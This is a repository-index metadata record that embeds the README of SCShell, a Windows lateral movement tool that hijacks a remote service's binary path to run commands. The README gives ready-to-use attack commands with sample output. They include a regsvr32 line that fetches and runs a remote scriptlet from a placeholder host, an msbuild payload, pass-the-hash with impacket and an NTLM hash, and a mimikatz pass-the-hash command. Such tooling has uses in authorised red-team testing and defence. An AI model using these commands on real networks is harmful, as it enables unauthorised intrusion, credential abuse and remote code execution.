{"id":13839896,"url":"https://github.com/Mr-Un1k0d3r/SCShell","last_synced_at":"2025-07-11T07:31:19.412Z","repository":{"id":44454099,"uuid":"221572133","full_name":"Mr-Un1k0d3r/SCShell","owner":"Mr-Un1k0d3r","description":"Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","archived":false,"fork":false,"pushed_at":"2023-07-10T01:31:54.000Z","size":119,"stargazers_count":1400,"open_issues_count":1,"forks_count":236,"subscribers_count":28,"default_branch":"master","last_synced_at":"2024-11-21T04:51:48.755Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Mr-Un1k0d3r.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-11-13T23:39:27.000Z","updated_at":"2024-11-15T21:47:47.000Z","dependencies_parsed_at":"2024-01-29T09:32:32.594Z","dependency_job_id":null,"html_url":"https://github.com/Mr-Un1k0d3r/SCShell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FSCShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FSCShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FSCShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FSCShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Mr-Un1k0d3r","download_url":"https://codeload.github.com/Mr-Un1k0d3r/SCShell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225705053,"owners_count":17511215,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:37.658Z","updated_at":"2024-11-21T09:30:33.852Z","avatar_url":"https://github.com/Mr-Un1k0d3r.png","language":"C","readme":"# SCShell\n\nSCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.\n\nThe utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)\n\n# How it work\n\nInstead of creating a service it simply remotely open a service and modify the binary path name via the `ChangeServiceConfigA` API.\n\nThen it starts the service.\n\nOnce the execution is completed the service binary path is reverted to the original one. The original service path is extracted using `QueryServiceConfigA`.\n\nEverything is happening over DCERPC including the authentication.\n\n![network](https://raw.githubusercontent.com/Mr-Un1k0d3r/SCShell/master/network.png)\n\n\n\n# Usage\n\nThe current build is written in `C` but I will port it to `C#` and `PowerShell`.\n\n```\nUsage:\nSCShell.exe target service payload domain username password\n```\n\n`target` can be set to `local` to run the payload locally\n\nRemote execution\n```\nSCShell.exe 192.168.197.131 XblAuthManager \"C:\\windows\\system32\\cmd.exe /c C:\\windows\\system32\\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll\" . administrastor Password\n```\n\nI recommend using `C:\\windows\\system32\\cmd.exe /c` to make sure to payload will not be killed once the service stop. You NEED to use the full path.\n\nYou can also use a msbuild payload\n```\nSCShell.exe 192.168.197.131 XblAuthManager \"C:\\windows\\system32\\cmd.exe /C C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe C:\\payload.csproj\" . administrator Password\nSCShell ***\nTrying to connect to 192.168.197.131\nUsername was provided attempting to call LogonUserA\nSC_HANDLE Manager 0x009ED250\nOpening XblAuthManager\nSC_HANDLE Service 0x009ED1B0\nService path was changed to C:\\windows\\system32\\cmd.exe /C C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe C:\\payload.csproj\nService was started.\n```\n\nI'm using the XblAuthManager as the target which is the Xbox Accessory Management Service\n\n# Passing the Hash\n\nscshell.py is a python2 \u0026 3 implementation of SCShell. Using impacket project it can easily be used to perform the same lateral movement using pass the hash.\n\nInstallation\n```\npip install impacket\n```\n\nUsage\n```\npython scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce\nImpacket v0.9.20 - Copyright 2019 SecureAuth Corporation\n\n[*] Command need to use FULL path. No command output.\nSCShell\u003e\n\n```\n\nYou can use the `C` utility to pass the hash. By default the current process token will be used. You can set the current process token using standard pass the hash approach.\n\nOn the local system\n```\nsekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe\n```\n\nThen run the SCShell.exe within the newly created cmd.exe.\n\n# Compiling from source\n\nThe code was compiled on Windows using GCC Mingw compiler\n\n# Credit\nMr.Un1k0d3r RingZer0 Team\n\nTazz0 for the moral support\n","funding_links":[],"categories":["C# #","C (286)","C","Pentesting"],"sub_categories":["ARM"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FSCShell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FMr-Un1k0d3r%2FSCShell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FSCShell/lists"}